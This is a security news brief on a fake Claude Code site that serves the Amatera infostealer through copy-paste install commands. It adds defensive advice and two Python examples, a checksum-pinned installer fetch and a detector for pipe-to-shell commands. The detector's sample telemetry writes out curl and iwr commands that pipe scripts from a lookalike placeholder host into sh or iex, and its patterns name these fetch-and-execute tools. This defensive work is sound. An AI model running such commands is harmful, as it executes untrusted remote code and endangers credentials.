FAKE CLAUDE CODE SITE DROPS AMATERA INFOSTEALER VIA ONE‑LINE INSTALLS
A convincing fake Claude Code website is tricking developers into installing the Amatera infostealer via copy-paste CLI commands.
Attackers cloned Anthropic’s Claude Code site closely enough that every link routes to the real product, except the one-line install command. Paste it into a macOS terminal, PowerShell, or CMD and you get malware instead of the tool, a pattern dubbed InstallFix. The payload here is Amatera, an infostealer that grabs browser passwords, session tokens, autofill data, and crypto wallets; the clone pages may be hosted on legitimate platforms such as Cloudflare Pages and Squarespace.
This targets the developer habit of copying shell installers straight from docs, turning a moment of inattention into code execution. If your team uses Claude Code or similar tools, verify domains before pasting anything, avoid curl | sh installers, prefer signed packages, and pin vetted install steps in internal docs. WebProNews has a solid overview of the clone and the workflow risk.
Developer workstations hold repo creds and session tokens; an infostealer there can cascade into source, CI, and cloud compromise.
The attack piggybacks on normal CLI install habits, so traditional email or browser filters may never trigger.
- Run a tabletop: can engineers distinguish the real Claude Code domain and installer from a pixel-perfect clone, and do they verify checksums or signatures?
- Attempt to install via curl | sh from a non-allowlisted domain on a managed laptop and confirm your controls block or flag it.
Legacy codebase integration strategies...
01. Add an allowlist for installer domains and enforce package-manager-only installs for dev tools across macOS and Windows endpoints.
02. Update onboarding docs to pin vetted install commands and require checksum/signature verification; remove any one-liners that pipe to shell.
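What a pinned, checksum-verified fetch looks like in place of a pipe-to-shell one-liner, as an added example: this is not Anthropic's installer and not code from the report. The allowlisted host example-vendor.invalid, the sample installer bytes and the pin derived from them are constructed for illustration; in practice the pin is the sha256 the vendor publishes for that release, copied into your onboarding docs, and the download host is whichever vendor domain your team has actually vetted.

```python
"""Pinned, checksum-verified installer fetch (added example, not vendor code).

The pattern: refuse anything that is not https from an exact, allowlisted host;
download to disk rather than a shell's stdin; compare the sha256 against a pin
recorded in internal docs; only then hand the file to a human to inspect and run.
"""
import hashlib
import hmac
import os
import stat
import tempfile
import urllib.request
from urllib.parse import urlsplit

# Assumed allowlist: the hosts your org has vetted for installer downloads.
# ".invalid" is a reserved TLD, so this is a placeholder, not a real vendor.
ALLOWED_INSTALLER_HOSTS = frozenset({"example-vendor.invalid"})


def host_allowed(url: str, allowed=ALLOWED_INSTALLER_HOSTS) -> bool:
    """True only for an https URL whose exact hostname is on the allowlist.

    Exact matching (not substring or suffix) is what defeats lookalikes such as
    example-vendor.invalid.attacker.test or user@example-vendor.invalid@attacker.test.
    """
    parts = urlsplit(url)
    host = parts.hostname
    return parts.scheme == "https" and host is not None and host.lower() in allowed


def sha256_matches(data: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the downloaded bytes' sha256 against the pin."""
    digest = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(digest, pinned_hex.lower())


def fetch_verified_installer(url: str, pinned_hex: str,
                             allowed=ALLOWED_INSTALLER_HOSTS) -> str:
    """Download the installer to a private temp file, verify it, return its path.

    Nothing is executed here: the caller inspects the file (e.g. `less`) and
    runs it deliberately. A hash mismatch or a bad host aborts before any write.
    """
    if not host_allowed(url, allowed):
        raise ValueError(f"refusing installer from non-allowlisted or non-https URL: {url}")
    with urllib.request.urlopen(url, timeout=30) as resp:
        data = resp.read()
    if not sha256_matches(data, pinned_hex):
        raise ValueError("installer sha256 does not match the pinned value; aborting")
    fd, path = tempfile.mkstemp(prefix="installer-", suffix=".sh")
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)  # owner-only
    return path


# Constructed sample: stands in for the bytes a vendor published. The pin is
# computed here only so the example is self-contained; in real use it is the
# value from the vendor's release notes, recorded in your onboarding docs.
SAMPLE_INSTALLER = b"#!/bin/sh\necho 'installing example tool'\n"
SAMPLE_PIN = hashlib.sha256(SAMPLE_INSTALLER).hexdigest()


if __name__ == "__main__":
    import sys
    # Usage: python pinned_fetch.py https://example-vendor.invalid/install.sh <sha256>
    print(fetch_verified_installer(sys.argv[1], sys.argv[2]))
```

The point of writing the pin into the docs rather than fetching a `.sha256` file from the same site is that a cloned site controls both; a pin your team recorded when the vendor release was vetted is the one thing the clone cannot change.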
Fresh architecture paradigms...
01. Ship internal tools via signed packages in official repos (Homebrew, winget, apt) instead of copy-paste installers.
02. Bake in workstation hardening: least-privilege local accounts, EDR that flags script-from-web execution, and DNS filtering for lookalike domains.
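Detection logic of the kind the EDR and lookalike-domain items above call for, run over a few constructed command-line telemetry records, as an added example: it is not any vendor's rule set and not code from the page. The allowlisted host example-vendor.invalid, the lookalike domain claude-code-install.invalid, the tab-separated `<user> <command>` record format and the brand tokens are assumptions for illustration; the real Claude Code install domains are not named in the report, so the allowlist here is a placeholder your team would fill in after vetting.

```python
"""Flag remote-script-to-shell execution and off-allowlist installer hosts in
command-line telemetry (added example; assumptions noted in comments)."""
import re
from urllib.parse import urlsplit

# Assumed: hosts your org has vetted for installer downloads (placeholder TLD).
ALLOWED_INSTALLER_HOSTS = frozenset({"example-vendor.invalid"})
# Assumed brand tokens: a non-allowlisted host containing one is a likely lookalike.
BRAND_TOKENS = ("claude", "anthropic")
SCRIPT_EXT = (".sh", ".bash", ".ps1", ".cmd", ".bat")

URL_RE = re.compile(r"https?://[^\s'\"|;)]+", re.IGNORECASE)
FETCH_RE = re.compile(
    r"\b(curl|wget|iwr|Invoke-WebRequest|irm|Invoke-RestMethod)\b", re.IGNORECASE)
# A shell or PowerShell interpreter reading the fetched bytes from a pipe.
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(sudo\s+)?(sh|bash|zsh|iex|Invoke-Expression)\b", re.IGNORECASE)
# The `sh -c "$(curl ...)"` variant: command substitution fed to an interpreter.
SUBST_RE = re.compile(
    r"\b(sh|bash|zsh)\s+-c\s+[\"']?\$\(\s*(curl|wget)\b", re.IGNORECASE)


def classify(cmd: str, allowed=ALLOWED_INSTALLER_HOSTS) -> list:
    """Return the reasons a command line should be flagged; [] means clean.

    Host checks apply only when the command looks like an installer run
    (executes what it fetched, or fetches a script file), so ordinary API calls
    with curl to internal hosts do not trip the rule.
    """
    reasons = []
    if not FETCH_RE.search(cmd):
        return reasons
    executes = bool(PIPE_TO_SHELL_RE.search(cmd) or SUBST_RE.search(cmd))
    if executes:
        reasons.append("remote-script-executed-without-inspection")
    for url in URL_RE.findall(cmd):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if not host:
            continue
        if not (executes or parts.path.lower().endswith(SCRIPT_EXT)):
            continue  # plain file/API fetch: out of scope for this rule
        if host not in allowed:
            reasons.append(f"non-allowlisted-host:{host}")
            if any(tok in host for tok in BRAND_TOKENS):
                reasons.append(f"brand-lookalike-host:{host}")
    return reasons


def scan(lines, allowed=ALLOWED_INSTALLER_HOSTS) -> list:
    """Apply classify() to '<user>\\t<command>' records (constructed format);
    return (user, command, reasons) for each flagged record."""
    findings = []
    for line in lines:
        user, _, cmd = line.partition("\t")
        reasons = classify(cmd, allowed)
        if reasons:
            findings.append((user, cmd, reasons))
    return findings


# Constructed sample telemetry: not real logs.
SAMPLE_LOG = [
    "dev1\tcurl -fsSL https://example-vendor.invalid/install.sh -o install.sh",
    "dev2\tcurl -fsSL https://claude-code-install.invalid/install.sh | sh",
    "dev3\tpowershell -c \"iwr https://claude-code-install.invalid/win.ps1 | iex\"",
    "dev4\tbrew install some-tool",
    "dev5\tsh -c \"$(curl -fsSL https://example-vendor.invalid/install.sh)\"",
]

if __name__ == "__main__":
    for user, cmd, reasons in scan(SAMPLE_LOG):
        print(f"{user}: {', '.join(reasons)}\n    {cmd}")
```

Note that dev5 is flagged even though the host is allowlisted: the rule treats "execute what you just fetched, sight unseen" as the problem independent of where it came from, which is exactly the habit InstallFix exploits. dev1, which downloads the same script to disk for inspection, is clean.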